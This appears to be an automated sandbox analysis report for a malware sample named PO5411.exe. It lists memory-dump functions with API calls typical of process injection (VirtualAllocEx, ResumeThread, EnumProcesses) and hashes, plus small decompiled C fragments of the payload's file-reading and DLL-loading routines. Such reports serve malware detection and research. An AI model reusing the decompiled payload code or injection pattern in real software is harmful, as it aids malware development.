                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738B820, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0738B8A3
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumProcesses
                                                    • String ID:
                                                    • API String ID: 84517404-0
                                                    • Opcode ID: c4db78c53ec69aa50f0ee0630db3841d1367bda66761c910091a6695bf466d22
                                                    • Instruction ID: 51ece68a26039784c16357da235a6c5fbf9b39f1c4e4819787f2fe3c1779d5f1
                                                    • Opcode Fuzzy Hash: c4db78c53ec69aa50f0ee0630db3841d1367bda66761c910091a6695bf466d22
                                                    • Instruction Fuzzy Hash: 3D21F3B1D0061A9FDB00CF99D884BDEFBB4BB49324F04812AE918A3240D778A944CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027AC412, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027AC3DE,?,?,?,?,?), ref: 027AC49F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: d2e6b8de0eaaf32c5285f839ada80a6dc4df0f930dcf6bf06b626f0c9a5f1e51
                                                    • Instruction ID: 4168625a17d76159a2af24f35aae869afc43ab2d12823bbb535348a1ae1713d8
                                                    • Opcode Fuzzy Hash: d2e6b8de0eaaf32c5285f839ada80a6dc4df0f930dcf6bf06b626f0c9a5f1e51
                                                    • Instruction Fuzzy Hash: C221E2B5900248EFDB10CFA9D584AEEFBF5FB48324F14842AE954A3350D378AA54CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389CD9, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07389D4E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 72bd48f135589d64e7245351ba3fb83b44841c77656d6c02c7e963e7dcdeeb0d
                                                    • Instruction ID: 21f5fba64c73ddbfa3416fc1a500858bb34aa1fb7293708584227f38ffb7edc3
                                                    • Opcode Fuzzy Hash: 72bd48f135589d64e7245351ba3fb83b44841c77656d6c02c7e963e7dcdeeb0d
                                                    • Instruction Fuzzy Hash: 8421A9729003499FCB10DFA9C8447EEBFF4EF48324F14841AE529A7210C775A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738BB80, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0738BBFB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 1fcc59182b4c7c82411397701d956b4a7624d990545f2e2b73636b76181cd113
                                                    • Instruction ID: a5bccdca32e63e5102e6a35f4995064091924a33a5af90cfc9446b775f338c3c
                                                    • Opcode Fuzzy Hash: 1fcc59182b4c7c82411397701d956b4a7624d990545f2e2b73636b76181cd113
                                                    • Instruction Fuzzy Hash: 2821F4B69002499FCB10DF9AD484BDEBBF4FB48320F148529E469A7350D778A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0738BB88, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0738BBFB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 157a4c893f8040bcdfd080a6dd621b9973353ed6b7a12c67c5f4cc88d43f8f4e
                                                    • Instruction ID: 2cf72bc3dc936c4f9bc6efc8f9fb6c0008c32ea9581bd33b042dfe89c4c4bc98
                                                    • Opcode Fuzzy Hash: 157a4c893f8040bcdfd080a6dd621b9973353ed6b7a12c67c5f4cc88d43f8f4e
                                                    • Instruction Fuzzy Hash: C921F4B59002499FCB10DF9AC484BDEFBF4FB48320F148429E568A7340D778A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389B31, Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: bccf745dacf727cdd27cd7c113862b42f424fb31e2d12f9db212d11375646768
                                                    • Instruction ID: a8679451dd498610d9dddaf4ae73d9bc9fc841e88f8523e804ab5ca40b7aadfa
                                                    • Opcode Fuzzy Hash: bccf745dacf727cdd27cd7c113862b42f424fb31e2d12f9db212d11375646768
                                                    • Instruction Fuzzy Hash: CC1158B19043598FDB10DFAAD8487EEFBF8EF88224F14842AD519A7340C774A944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027A9E08, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,027AA4B1,00000800,00000000,00000000), ref: 027AA6C2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 2ce988311f5880205dd9673683f378aa7f08baf12c93b1ecd0be6c4af752d349
                                                    • Instruction ID: b3005abe38c413d18ec534f0a90a173710b043bc912554b09d8783b5a4c964f2
                                                    • Opcode Fuzzy Hash: 2ce988311f5880205dd9673683f378aa7f08baf12c93b1ecd0be6c4af752d349
                                                    • Instruction Fuzzy Hash: AA1114B29002499FDB10CF9AD448ADEFBF4EB98364F04852AE515B7700C3B5A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389CE0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07389D4E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 388d97445fc8bac49fa5d3d6bf7ba547a831ec71157465f895f23adf500e6918
                                                    • Instruction ID: 19ebf1f179e8f03411ec76768db389ac8ccd4b2c2fcc20d7a0f9b45ce34ec550
                                                    • Opcode Fuzzy Hash: 388d97445fc8bac49fa5d3d6bf7ba547a831ec71157465f895f23adf500e6918
                                                    • Instruction Fuzzy Hash: 0B1126B29003499FCB10DFA9C8487EEBBF5AF48324F148419E529A7250C775A954CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07389B38, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: d1603c614c06a7c5fd4c3811c0c25ac9af36f5e82550d62db4314ebca5cb0339
                                                    • Instruction ID: 805fbc8ea5821ec71f9d40c471d978d28169d0ace5c422f11560b4ff2becee47
                                                    • Opcode Fuzzy Hash: d1603c614c06a7c5fd4c3811c0c25ac9af36f5e82550d62db4314ebca5cb0339
                                                    • Instruction Fuzzy Hash: 36113AB19043488FDB10DFAAC4447EEFBF8AF88224F148429D519A7340C775A944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027AA3D0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 027AA436
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: e517e3dcec61394c35d67c46ccfb65439acdf56b4ed9ce31343db20f413d1ce1
                                                    • Instruction ID: a8ee72dfaaf1bc6906d982e53f47ceec53e01f6eb2fe7a2f407667b38e9a0057
                                                    • Opcode Fuzzy Hash: e517e3dcec61394c35d67c46ccfb65439acdf56b4ed9ce31343db20f413d1ce1
                                                    • Instruction Fuzzy Hash: 2611D2B5D002498FCB10CF9AD448BDEFBF4AF89224F14852AD829B7600D3B5A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F6D3D8, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781265757.0000000000F6D000.00000040.00000001.sdmp, Offset: 00F6D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 543fd16fbc14e6b24e70282b187f3bc2ae7fce6b067bd3cd2de288c9e5439c6b
                                                    • Instruction ID: 50b35211a15137030dc22b5987d1339ca2c4faaf226d8ff3a9a8fdf14530f140
                                                    • Opcode Fuzzy Hash: 543fd16fbc14e6b24e70282b187f3bc2ae7fce6b067bd3cd2de288c9e5439c6b
                                                    • Instruction Fuzzy Hash: 3C2128B2A04244DFDB04CF10D9C0F16BBA5FB98324F24C569E9094B24AC736EC46EBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F6D4C4, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781265757.0000000000F6D000.00000040.00000001.sdmp, Offset: 00F6D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 725516276ae3864ea7eb9d0b3337deef4844d3d06470cfbac171b06c89dddb44
                                                    • Instruction ID: def8952f528b226c2cb0abd3059324b89d7d625fd5fce0788600f083c8d6a771
                                                    • Opcode Fuzzy Hash: 725516276ae3864ea7eb9d0b3337deef4844d3d06470cfbac171b06c89dddb44
                                                    • Instruction Fuzzy Hash: 6D2106B2E04240DFCB15DF10D8C0B26BF65FB88328F288569E9064B606C336DC46EBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F7D01C, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781411070.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9234bf70b89bfae77c2c19b9d760e3b74849792bf59023d75056dcff297de177
                                                    • Instruction ID: 7bcd5cb18d36cfa1427e2f4a28b138ccf7ef5e81c4d47b5c2c424e7b30dcbeec
                                                    • Opcode Fuzzy Hash: 9234bf70b89bfae77c2c19b9d760e3b74849792bf59023d75056dcff297de177
                                                    • Instruction Fuzzy Hash: BE21C1B5904240DFCB14DF10D9C4B16BBB5FF84324F64C56AD90D4B24AC376D846DA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F7D2BC, Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781411070.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f96b54cca7d80bd60580225af46f1e68889fbcad02a6d787fe1f1601b333da7
                                                    • Instruction ID: 01f311984477bc31a9355e9bf5eca692a28382aa1a16bc173a8183a1e54298d1
                                                    • Opcode Fuzzy Hash: 4f96b54cca7d80bd60580225af46f1e68889fbcad02a6d787fe1f1601b333da7
                                                    • Instruction Fuzzy Hash: 282123B29082449FD740CF14D5C4B2ABBB5FF84324F64C56ED94D5B245C376E806D6A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F7D005, Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781411070.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f2ff99394d9357e6782355972f7746dbd06dab5ed09d61dd63a33c5c9358116
                                                    • Instruction ID: 2385d6360d625b0b4850ebc023fd76c45a66b45a1d9ee531148a76c9039fa42f
                                                    • Opcode Fuzzy Hash: 3f2ff99394d9357e6782355972f7746dbd06dab5ed09d61dd63a33c5c9358116
                                                    • Instruction Fuzzy Hash: 45214F755093808FCB12CF24D994B15BF71EF46324F28C5EBD8498B697C33A984ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F6D3D3, Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781265757.0000000000F6D000.00000040.00000001.sdmp, Offset: 00F6D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                    • Instruction ID: 3b47c07e8f8775e2eb93a0dfec2fcc6e8f1860175c4bb4258180faf8f00fede0
                                                    • Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                    • Instruction Fuzzy Hash: 9711E6B6904280DFCF15CF10D5C4B16BF71FB98324F28C6A9D8094B65AC33AE856DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F6D4BF, Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781265757.0000000000F6D000.00000040.00000001.sdmp, Offset: 00F6D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                    • Instruction ID: 582958661a1f4464f726d0e2b81a367e5bf21cdc0edad8a32877497d9e6ef868
                                                    • Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                    • Instruction Fuzzy Hash: F111D376D04280CFCB15CF10D5C4B16BF71FB88324F28C6AAD8450BA16C336D856DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F7D2B7, Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.781411070.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c290966d431b771c232c848e2df3a4f71e4c0d9c3d497cbce964f844d3499f65
                                                    • Instruction ID: 4ddeca23601aec37c434dc41f9dbedf2a58297906700a6c7d2f9b87b1b40ab0a
                                                    • Opcode Fuzzy Hash: c290966d431b771c232c848e2df3a4f71e4c0d9c3d497cbce964f844d3499f65
                                                    • Instruction Fuzzy Hash: 1311C1B2904284CFCB11CF14D5C4719FBB1FB85324F28C6AAC8494B646C33AD80ACB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 027AF0D8, Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 629398d5d9e06e33cd8919042844ad1fbf878a234b310a5e4078f26eb1287bce
                                                    • Instruction ID: dae5eaa99f148470b6213fff0137c41cd133f328c59ea91b430c99e65037ed0b
                                                    • Opcode Fuzzy Hash: 629398d5d9e06e33cd8919042844ad1fbf878a234b310a5e4078f26eb1287bce
                                                    • Instruction Fuzzy Hash: 5B12D7F9412B46EBD314CF65E8883A93BA0F744328F914228D3611BAD6D7BD196ACF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027ACC94, Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4758f90de30daca7049e53918c99c8081992999d79e372d8557ba424d607534e
                                                    • Instruction ID: 9d66d67e15513e8181c3b21de75a38572caef85a794f89f4e4e18da4c452431a
                                                    • Opcode Fuzzy Hash: 4758f90de30daca7049e53918c99c8081992999d79e372d8557ba424d607534e
                                                    • Instruction Fuzzy Hash: F5A17B32E002199FCF16DFB5C95459EBBB2FFC9314B15826AE905BB220EB35A945CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027AF0C8, Relevance: .2, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.782536825.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67dd9783efffb7ca89a1c63b13b4558fb12e78a3ae37b60531b59d382e0e57a3
                                                    • Instruction ID: 2533a7ae7f2e0063c99fddfa03cdc8af1e280c144d102fa58769ebe55812d457
                                                    • Opcode Fuzzy Hash: 67dd9783efffb7ca89a1c63b13b4558fb12e78a3ae37b60531b59d382e0e57a3
                                                    • Instruction Fuzzy Hash: 1EC14CB9812746EBD314CF65E8883993BB1FB44328F514328D3612BAD6D7BC196ACF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07382ED0, Relevance: .2, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e490916d153a6a5b657169b4021b5537227367b9a38dcb7dda03cfbc27e6fc69
                                                    • Instruction ID: 62644d6b151aa8800d065c913ac29b3a50ccbe13a89d0217d3b6596ba85fc865
                                                    • Opcode Fuzzy Hash: e490916d153a6a5b657169b4021b5537227367b9a38dcb7dda03cfbc27e6fc69
                                                    • Instruction Fuzzy Hash: A4515C70A166888BD748EF7BE8506997BF3EBC9304F04C43AC1059F368EB785915DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07382EE0, Relevance: .1, Instructions: 142COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e256a1798e831f915a29b5c1429d1317357088089f185230880cc9a6095fca0
                                                    • Instruction ID: 1a0d232e760c30afd10bd37915f2e1b479841eea66e747a1fa6954c19d8fb1f8
                                                    • Opcode Fuzzy Hash: 6e256a1798e831f915a29b5c1429d1317357088089f185230880cc9a6095fca0
                                                    • Instruction Fuzzy Hash: 88514B70A166888BD748EF7BE85068A7BF3EBC9304F04C53AC1059F368EB785916DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07380F6C, Relevance: .1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 924761008ae5b8178db6a4d9034f3e63c7efc0746abbe19d0c278ecc37b8cfa8
                                                    • Instruction ID: 538d50f2f6d0c62f4bfac532d2c06274e278d33f4004a3f2ded3514cf99de69c
                                                    • Opcode Fuzzy Hash: 924761008ae5b8178db6a4d9034f3e63c7efc0746abbe19d0c278ecc37b8cfa8
                                                    • Instruction Fuzzy Hash: FC3165B9E5110F8BDF10EFA9E4909ADF3F1FB08304B14A26AD416EB241DB35A945CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 07386AAD, Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.800501431.0000000007380000.00000040.00000001.sdmp, Offset: 07380000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 946dc4427c5856ff1e5fe1d41ee512bbb350c875c87c83e352767e9becbe9f52
                                                    • Instruction ID: 88a44aed42069d96c5f43efe3da93cfc3c94b7a8c902b2213adfab7dfc29282e
                                                    • Opcode Fuzzy Hash: 946dc4427c5856ff1e5fe1d41ee512bbb350c875c87c83e352767e9becbe9f52
                                                    • Instruction Fuzzy Hash: 83315A79E6120ACBDF20DFBAE491AADF7F2BF48344B14E215E016EB244DA34D844CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: PO5411.exe PID: 6140 Parent PID: 6788 PO5411.exeCOMMON

                                                    Executed Functions

                                                    Function 0041825D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E0041825D(void* __eax, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, intOrPtr _a36) {
				intOrPtr _v0;
				void* _t20;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t15 = _v0;
				_t32 = _v0 + 0xc48;
				E00418DB0(_t30, _t15, _t32,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a28; // 0x413d42
				_t12 =  &_a4; // 0x413d42
				_t20 =  *((intOrPtr*)( *_t32))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32, _a36, _t31, _t34, _t34); // executed
				return _t20;
			}









                                                    0x00418263
                                                    0x0041826f
                                                    0x00418277
                                                    0x00418282
                                                    0x0041829d
                                                    0x004182a5
                                                    0x004182a9

                                                    APIs
                                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: B=A$B=A
                                                    • API String ID: 2738559852-2767357659
                                                    • Opcode ID: 98094a1c021286011d55188923f6edc1c762f8672b2d54aae2189dbfd850c0e9
                                                    • Instruction ID: 12fe94cd786ebaafaf2d54857f890e8463963f7d6c197bf05f4b4b798a84dc80
                                                    • Opcode Fuzzy Hash: 98094a1c021286011d55188923f6edc1c762f8672b2d54aae2189dbfd850c0e9
                                                    • Instruction Fuzzy Hash: 7FF0A9B2200208AFDB14DF89DC81EEB77ADEF8C754F158259BA1D97241DA34EC518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                    0x00418263
                                                    0x0041826f
                                                    0x00418277
                                                    0x00418282
                                                    0x0041829d
                                                    0x004182a5
                                                    0x004182a9

                                                    APIs
                                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: B=A$B=A
                                                    • API String ID: 2738559852-2767357659
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                    0x00409b2c
                                                    0x00409b2f
                                                    0x00409b34
                                                    0x00409b39
                                                    0x00409b43
                                                    0x00409b48
                                                    0x00409b4b
                                                    0x00409b4d
                                                    0x00409b55
                                                    0x00409b5a
                                                    0x00409b5a
                                                    0x00409b61
                                                    0x00409b69
                                                    0x00409b6c
                                                    0x00409b6e
                                                    0x00409b82
                                                    0x00000000
                                                    0x00409b84
                                                    0x00409b8a
                                                    0x00409b3e
                                                    0x00409b3e
                                                    0x00409b3e

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.848751535.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                    • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                    • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
